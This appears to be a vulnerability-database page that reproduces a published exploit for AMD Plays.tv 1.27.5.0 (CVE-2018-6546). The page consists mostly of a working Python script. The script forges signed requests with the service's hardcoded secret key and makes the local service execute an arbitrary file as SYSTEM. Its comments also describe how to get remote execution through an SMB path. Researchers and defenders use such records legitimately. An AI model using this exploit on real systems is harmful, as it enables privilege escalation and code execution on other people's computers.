Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtSecurifera1337DAY-ID-30185
HistoryApr 17, 2018 - 12:00 a.m.

AMD Plays.tv 1.27.5.0 - plays_service.exe Arbitrary File Execution Exploit

2018-04-1700:00:00
Securifera
0day.today
15

0.505 Medium

EPSS

Percentile

97.5%

JSON

Exploit for windows platform in category local exploits

########################################################################
#  http://support.amd.com/en-us/download?cmpid=CCCOffline - 
#  Click "Automatically Detect - Download Now"
#  Installation Automatically Installs "Raptr, Inc Plays TV Service"
#
#  OR
#
#  https://plays.tv/download
#
#  Target OS:   Windows( Any )
#  Privilege:   SYSTEM
#  Type:        Arbitrary File Execution
#
#  Notes:       Second minor bug allows for arbitrary file write of 
#               uncontrolled data using the /extract_files path.
#
########################################################################
 
#!/usr/bin/python3
import urllib.request
import json
import hashlib
 
def check_svc( path, data ):
       
  #Setup request
  request = urllib.request.Request(addr)
 
  #add post data
  try:
    resp = urllib.request.urlopen(request, "data".encode("utf-8"))
    return "[-] Not Raptr, Plays TV service"
  except urllib.error.HTTPError as err:
    error_message = err.read().decode("utf-8")
    if error_message == 'Security failed - Missing hash or message[data]':
        return "[+] Raptr, Plays TV service"
 
def post_req( path, data ):
   
  secret_key = 'a%qs0t33QgiE6ut^0I&Y'
     
  #Setup request
  request = urllib.request.Request(addr)
  json_data = json.dumps(data)
   
  m = hashlib.md5()
  hash_data = path + json_data + secret_key
  m.update(hash_data.encode('utf8'))
  hash_str = m.hexdigest()
   
  #add post data
  p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")
  resp = urllib.request.urlopen(request, p_data)
  return resp.read()
 
#Target IP address
ip = '127.0.0.1'
 
##############################################################
# The service binds to an ephemeral port defined at
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service] 
##############################################################
port = 50452
 
##############################################################
# The service calls CreateProcess with the following format: 
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
#
# One way to achieving remote code execution is to use SMB
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
##############################################################
cmd = "C:\\Windows\\System32\\calc.exe"       #Local Execution
data = {
  "installer": cmd,
  "appdata": cmd
}
 
#Set url
path = '/execute_installer'
addr = 'http://' + ip + ':' + str(port) + path
 
#Check if the remote service is a Raptr Plays TV svc
#ret = check_svc(data, path)
#print(ret)
 
#Exploit service
ret = post_req(path, data)
print(ret)

#  0day.today [2018-04-17]  #

Related

checkpoint_advisories 1
cvelist 1
prion 1
nvd 1
packetstorm 1
cve 1
checkpoint_advisories
checkpoint_advisories
Plays.tv Remote Code Execution (CVE-2018-6546)
2020-06-05 00:00:00
cvelist
cvelist
CVE-2018-6546
2018-04-13 16:00:00
prion
prion
Code injection
2018-04-13 16:29:00
nvd
nvd
CVE-2018-6546
2018-04-13 16:29:01
packetstorm
packetstorm
AMD Plays.tv 1.27.5.0 Arbitrary File Execution
2018-04-15 00:00:00
cve
cve
CVE-2018-6546
2018-04-13 16:29:01

0.505 Medium

EPSS

Percentile

97.5%

JSON
Related for 1337DAY-ID-30185
checkpoint_advisories1cvelist1prion1nvd1packetstorm1cve1